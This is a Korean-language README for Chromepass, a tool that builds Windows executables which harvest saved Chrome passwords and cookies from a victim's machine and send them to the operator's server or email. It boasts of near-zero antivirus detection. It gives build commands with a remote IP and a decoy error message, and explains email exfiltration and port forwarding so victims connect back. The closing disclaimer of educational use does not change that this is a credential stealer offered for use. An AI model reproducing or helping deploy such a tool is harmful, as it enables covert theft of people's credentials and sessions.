
Chromepass - Chrome 저장된 비밀번호 해킹
Chromepass는 다음과 같은 기능을 제공하는 Windows 실행 파일을 생성하는 Python 기반 콘솔 애플리케이션입니다.
새로운 클라이언트 빌드 방법론은 AV 회피 전술 없이도 사실상 0% 탐지율을 보장합니다. 향후 이 사실이 깨질 경우 AV 회피를 개선하기 위한 몇 가지 방법이 구현될 예정입니다.
최신 스캔 예시 (참고: 10~12시간 내에 0-2건 탐지에서 32건 탐지로 증가하므로 직접 빌드한 파일을 분석하세요):
매우 간단한 애플리케이션으로, 다음만 사용합니다:
설치는 Windows VM 내에서 수행하는 것이 좋습니다. 설치 절차의 일부가 기존 구성에 영향을 받을 수 있습니다. 이는 깨끗한 Windows 10 VM에서 테스트되었습니다.
Chromepass는 컴파일을 위해 Windows가 필요합니다! Linux 및 macOS 지원은 곧 추가될 수 있습니다.
git clone https://github.com/darkarp/chromepass
참고: 저장소를 클론하는 대신 최신 릴리스를 다운로드할 수도 있습니다. 저장소는 버그가 더 많을 수 있습니다.
의존성은 자동으로 확인 및 설치되므로 사용법으로 바로 넘어가셔도 됩니다. 충돌이 없도록 깨끗한 VM을 사용하는 것이 좋습니다.
의존성이 없고 인터넷 속도가 느리면 시간이 오래 걸릴 수 있습니다. 커피 한 잔 하면서 기다리세요.
Chromepass는 매우 직관적입니다. 다음 명령으로 실행하세요:
python create.py -h
옵션 목록이 나타나며 설명이 포함되어 있습니다.
매개변수 없이 실행하면 127.0.0.1에 연결되는 서버와 클라이언트가 빌드됩니다.
빌드 예시:
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'
서버와 클라이언트를 생성한 후, 클라이언트가 실행될 때 서버가 실행 중인지 확인하세요.
쿠키와 비밀번호는 서버와 동일한 디렉토리에 있는 data라는 새 폴더에 IP 주소별로 분리된 json 파일로 저장됩니다.
Chromepass는 이메일을 통한 파일 전송을 지원하지만 아직 실험적 기능입니다.
이 기능을 활성화하려면 서버 생성 시 --email 플래그를 사용하세요. 사용자 이름(이메일)과 비밀번호(앱 비밀번호)가 필요합니다.
앱 비밀번호를 생성하려면 계정 설정 -> 보안으로 이동하여 2단계 인증을 활성화해야 합니다. (필수!)
2단계 인증이 활성화되면 앱 비밀번호라는 새 옵션이 나타납니다:

해당 옵션을 클릭하고 적절한 옵션을 선택한 후 비밀번호를 생성하세요:

생성을 클릭하면 필요한 비밀번호가 제공됩니다.
명령어에 사용자 이름과 비밀번호를 직접 입력하거나, config.ini 파일의 YOUR_USERNAME 및 YOUR_PASSWORD 부분에 넣을 수 있습니다.
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh
python create.py --error --message 'An Error has happened' --email
원격 시나리오에서 사용하려면 포트 포워딩(기본 포트 80)도 수행해야 합니다. 그래야 피해자가 클라이언트를 실행할 때 올바른 포트로 서버에 연결할 수 있습니다.
일반적인 정보는 여기를 클릭하세요. 더 자세한 내용은 구글 검색을 수행하세요.
자동 설정은 실험적입니다. 여러 이유로 인해 설정이 의존성을 올바르게 설치하지 못할 수 있습니다. 그 경우 수동으로 설치해야 합니다.
다행히 의존성은 2개뿐입니다:
빌드 도구 대신 Visual Studio를 설치해도 되지만 더 많은 공간을 차지합니다.
빌드 도구를 성공적으로 설치한 후, Rustup 웹사이트에서 rustup-init.exe를 실행하면 됩니다.
이것으로 필요한 의존성 설치가 완료되며, 준비가 완료됩니다.
오류나 버그를 발견하면 이슈로 보고해 주세요. 기능이나 개선 사항을 제안하려면 이슈 페이지에 보고해 주세요.
이슈 생성 시 표시되는 템플릿을 따라주세요.
완전 초보자부터 노련한 베테랑까지 다양한 컴퓨터 보안 전문가 지망생 커뮤니티에 참여하려면 Discord 서버에 가입하세요: WhiteHat Hacking
저에게 연락하고 싶다면 다음 이메일로 보내주세요: [email protected]
제공된 정보와 코드를 사용하여 발생하는 결과에 대해 저는 책임을 지지 않습니다. 이는 전문적 또는 교육적 목적으로만 사용됩니다.
